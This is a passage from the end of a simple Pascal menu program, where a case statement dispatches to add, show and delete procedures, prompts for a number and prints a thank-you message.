1:add;
2:show;
3:del;
end;
write('enter a number:');
readln(num);
end;
write(' thanck you for use program');
readln;
end.